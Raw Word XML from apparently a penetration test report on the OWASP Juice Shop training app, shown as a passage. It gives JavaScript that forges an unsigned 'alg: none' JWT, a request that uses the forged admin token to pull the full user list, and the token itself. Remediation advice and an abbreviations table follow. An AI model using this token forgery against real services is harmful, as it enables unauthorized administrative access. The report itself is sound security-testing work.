        <w:t xml:space="preserve"> forgedToken </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">btoa</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(header))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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">btoa</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(payload)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Access protected APIs with forged token:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET http://localhost:3333/api/Users/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer [FORGED_TOKEN]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: 200 OK - Full user list accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Forged Token:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6OTk5LCJ1c2VybmFtZSI6ImhhY2tlciIsImVtYWlsIjoiaGFja2VyQGV2aWwuY29tIiwicm9sZSI6ImFkbWluIn19.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reject tokens with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘alg’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- The server must explicitly reject any JWT with algorithm set to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce algorithm whitelist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Only accept specific algorithms (e.g., RS256, HS256) and validate against an allowed list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Verify signatures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Always verify JWT signatures using the appropriate key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use strong secrets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- If using HMAC, ensure the secret is cryptographically strong and rotated regularly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Validate claims</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Verify issuer (iss), audience (aud), expiration (exp), and other claims</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Store tokens securely</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Consider using httpOnly cookies instead of localStorage to prevent XSS-based token theft</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="appendix-a---lists-scripts-and-raw-data"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix A - Lists, Scripts and Raw Data</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="appendix-b---list-of-abbreviations"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix B - List of Abbreviations</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="4375"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="5060"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abbreviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Description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CAPTCHA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Completely Automated Public Turing test to</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">tell Computers and Humans Apart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Common Vulnerability Scoring System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">File Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Direct Object Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Message-Digest Algorithm 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OAuth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Open Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Object-Relational Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Open Web Application Security Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PII</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Personally Identifiable Information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TOTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Time-based One-Time Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">URI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Uniform Resource Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web Application Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+—————-+———————————————+</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ww.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId16" Target="https://www.first.org/cvss/v4.0/specification-document" TargetMode="External" /></Relationships>
</file>

<file path=word/_rels/footnotes.xml.rels><?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId16" Target="https://www.first.org/cvss/v4.0/specification-docu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2026-02-23T00:20:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-23T00:20:22Z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2026-02-23</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OWASP Juice Shop v19.1.1</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